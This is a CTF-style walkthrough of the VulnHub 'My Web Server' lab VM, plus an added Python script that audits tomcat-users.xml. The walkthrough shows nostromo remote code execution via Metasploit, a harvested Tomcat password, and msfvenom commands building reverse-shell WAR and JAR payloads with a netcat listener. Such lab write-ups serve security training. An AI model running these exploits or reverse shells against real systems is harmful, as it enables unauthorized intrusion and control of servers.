VulnHub – My Web Server Walkthrough

Scanning the target with nmap -A -T4 -p- 192.168.1.7 -vv

There are a few open ports. I dirbed them, but what's interesting is port 2222:

The link http://192.168.1.7:2222/cgi-bin/printenv gave us a printenv file with some information we can take advantage of: the target is running a nostromo server, and we have the port and the URI path (the host is also running a Tomcat server on port 8080, but leave that for now):

Searching for nostromo with Searchsploit, we get some exploits:

And with the help of Metasploit we can do this: use exploit/multi/http/nostromo_code_exec

We already know that the target is running Tomcat on port 8080, so we need to find the users file that holds the password for the Tomcat server. The directory is /usr/local/tomcat/conf/, and there we view the file tomcat-users.xml, which has the information:

We can log in with tomcat: @sprot0230sp
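
Seen from the defender's side, what made this step possible is a tomcat-users.xml that the web server account could read and that holds a cleartext password for a user of the Tomcat manager. The audit script below is an added example, not part of the original walkthrough; the sample file, its user names and values, the function names and the digest heuristic are assumptions made for illustration.

```python
import os
import re
import stat
import tempfile
import xml.etree.ElementTree as ET

# Roles that allow deploying WAR files through the Tomcat Manager application.
DEPLOY_ROLES = {"manager-gui", "manager-script"}
# Heuristic (assumption): digested credentials are hex, or salt$iterations$hex.
DIGEST_RE = re.compile(r"^(?:[0-9a-fA-F]{32,128}|[0-9a-fA-F]+\$\d+\$[0-9a-fA-F]+)$")

# Constructed sample file; user names, password and digest are placeholders.
SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <user username="deployer" password="ExamplePlaintext1" roles="manager-gui,manager-script"/>
  <user username="monitor" password="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef" roles="manager-status"/>
</tomcat-users>
"""

def audit_tomcat_users(path):
    """Return a list of findings for one tomcat-users.xml file."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append(f"file mode {mode:04o}: readable beyond the owner")
    for el in ET.parse(path).getroot().iter():
        if el.tag.rsplit("}", 1)[-1] != "user":  # ignore the XML namespace
            continue
        name = el.get("username", "?")
        roles = {r.strip() for r in el.get("roles", "").split(",")}
        if not DIGEST_RE.match(el.get("password", "")):
            findings.append(f"{name}: password stored in cleartext")
        granted = sorted(roles & DEPLOY_ROLES)
        if granted:
            findings.append(f"{name}: can deploy WAR files via {', '.join(granted)}")
    return findings

def run_sample():
    """Write SAMPLE to a temp file with mode 0644 and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "tomcat-users.xml")
        with open(path, "w") as fh:
            fh.write(SAMPLE)
        os.chmod(path, 0o644)
        return audit_tomcat_users(path)

if __name__ == "__main__":
    for line in run_sample():
        print(line)
```

On a real host, point audit_tomcat_users at the conf/tomcat-users.xml of the Tomcat installation and treat any finding for a manager role as a priority.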

After we log in, we need to create a WAR file to upload:

msfvenom -p java/shell_reverse_tcp lhost=192.168.1.6 lport=3333 -f war -o shell.war

I used Metasploit as it's much more stable, but you can use nc -lvp 3333

The user tomcat can run sudo:

Once again we create a shell using msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=1234 -f raw -o exploit.jar

And start a new Metasploit session:

Navigate to the root directory and catch the flag:
